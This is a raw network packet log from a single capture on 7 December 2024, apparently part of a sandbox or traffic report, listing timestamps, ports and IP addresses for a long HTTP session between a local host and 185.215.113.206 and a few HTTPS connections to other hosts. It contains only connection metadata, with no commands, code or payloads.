Dec 7, 2024 10:51:18.518739939 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.518754005 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.519352913 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.519399881 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.519440889 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.519478083 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.519491911 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.519517899 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.519522905 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.519524097 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.519555092 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.519567013 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.519593000 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.519607067 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.519619942 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.519632101 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.519644976 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.519646883 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.519659996 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.519669056 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.519685030 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.519697905 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.519711018 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.519712925 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.519736052 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.519759893 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.520447016 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.520461082 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.520478964 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.520508051 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.520508051 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.520520926 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.520533085 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.520546913 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.520559072 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.520559072 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.520560026 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.520574093 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.520586014 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.520591974 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.520600080 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.520606995 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.520613909 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.520627022 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.520629883 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.520641088 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.520648956 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.520679951 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.521452904 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.521469116 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.521483898 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.521497011 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.521507978 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.521512985 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.521521091 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.521526098 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.521533966 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.521548033 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.521555901 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.521555901 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.521559954 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.521574020 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.521584988 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.521588087 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.521599054 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.521611929 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.521624088 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.521640062 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.521656990 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.522217035 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.522231102 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.522265911 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.522275925 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.522277117 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.522289991 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.522319078 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.522336006 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.522336960 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.522351027 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.522361040 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.522363901 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.522377968 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.522381067 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.522393942 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.522413969 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.522430897 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.523030996 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.523042917 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.523061991 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.523073912 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.523087025 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.523089886 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.523099899 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.523113012 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.523121119 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.523124933 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.523140907 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.523150921 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.523164034 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.523171902 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.523178101 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.523190975 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.523205042 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.523298025 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.523329020 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.523804903 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.523822069 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.523833990 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.523857117 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.523876905 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.523952961 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.523964882 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.523978949 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.523991108 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.523993015 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.524003983 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.524017096 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.524028063 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.524034977 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.524040937 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.524048090 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.524061918 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.524072886 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.524094105 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.524094105 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.524364948 CET	49718	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:18.524413109 CET	443	49718	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:18.524668932 CET	49718	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:18.524785042 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.524799109 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.524817944 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.524827957 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.524831057 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.524847984 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.524847984 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.524873972 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.524880886 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.524893999 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.524908066 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.524908066 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.524920940 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.524928093 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.524934053 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.524945974 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.524947882 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.524960995 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.524972916 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.524977922 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.524988890 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.525015116 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.525217056 CET	49718	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:18.525234938 CET	443	49718	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:18.525784969 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.525799036 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.525810003 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.525823116 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.525835991 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.525840044 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.525850058 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.525861979 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.525862932 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.525876999 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.525890112 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.525912046 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.525938988 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.526371002 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.526385069 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.526396036 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.526411057 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.526424885 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.526427984 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.526460886 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.526463032 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.526485920 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.526498079 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.526499033 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.526511908 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.526523113 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.526527882 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.526534081 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.526546001 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.526555061 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.526560068 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.526581049 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.526604891 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.527375937 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.527388096 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.527405977 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.527417898 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.527427912 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.527431011 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.527446032 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.527446985 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.527460098 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.527475119 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.527491093 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.527515888 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.527523041 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.527535915 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.527548075 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.527559042 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.527571917 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.527584076 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.527595997 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.527606010 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.527638912 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.528147936 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.528209925 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.528208017 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.528223991 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.528258085 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.528279066 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.528286934 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.528291941 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.528312922 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.528315067 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.528326035 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.528337002 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.528347969 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.528352022 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.528361082 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.528373957 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.528387070 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.528399944 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.528400898 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.528424978 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.528445959 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.528822899 CET	49719	443	192.168.2.6	23.206.197.17
Dec 7, 2024 10:51:18.528839111 CET	443	49719	23.206.197.17	192.168.2.6
Dec 7, 2024 10:51:18.529000998 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.529020071 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.529112101 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.529112101 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.529118061 CET	49719	443	192.168.2.6	23.206.197.17
Dec 7, 2024 10:51:18.529118061 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.529131889 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.529174089 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.529319048 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.529371023 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.529428959 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.529613972 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.530410051 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.530489922 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.530500889 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.530560017 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.531501055 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.531549931 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.531588078 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.531665087 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.532608986 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.532663107 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.532665968 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.532701969 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.533663034 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.533719063 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.533730030 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.533768892 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.534712076 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.534804106 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.534858942 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.535737991 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.535787106 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.535855055 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.536041021 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.536829948 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.536880016 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.536947966 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.537091017 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.537257910 CET	49719	443	192.168.2.6	23.206.197.17
Dec 7, 2024 10:51:18.537267923 CET	443	49719	23.206.197.17	192.168.2.6
Dec 7, 2024 10:51:18.537908077 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.538014889 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.538037062 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.538100958 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.539000988 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.539064884 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.539107084 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.539166927 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.540050983 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.540112972 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.540122032 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.540188074 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.540730953 CET	49720	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:18.540761948 CET	443	49720	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:18.541014910 CET	49720	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:18.541141987 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.541191101 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.541238070 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.541285038 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.541331053 CET	49721	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:18.541357994 CET	443	49721	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:18.541459084 CET	49721	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:18.542861938 CET	49720	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:18.542876959 CET	443	49720	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:18.542957067 CET	49721	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:18.542973995 CET	443	49721	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:18.588591099 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.588663101 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.588670015 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.588730097 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.589062929 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.589164972 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.589210033 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.589210033 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.590135098 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.590195894 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.590250015 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.590332031 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.591262102 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.591327906 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.591528893 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.591622114 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.624993086 CET	49722	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:18.625020981 CET	443	49722	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:18.625165939 CET	49722	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:18.626174927 CET	49722	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:18.626189947 CET	443	49722	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:18.637780905 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.637814045 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.637856960 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.637892008 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.638073921 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.638086081 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.638117075 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.638129950 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.638938904 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.638983965 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.639091969 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.639142990 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.639988899 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.640045881 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.640065908 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.640105963 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.641113997 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.641163111 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.641247988 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.641439915 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.642235041 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.642283916 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.642288923 CET	80	49713	185.215.113.206	192.168.2.6
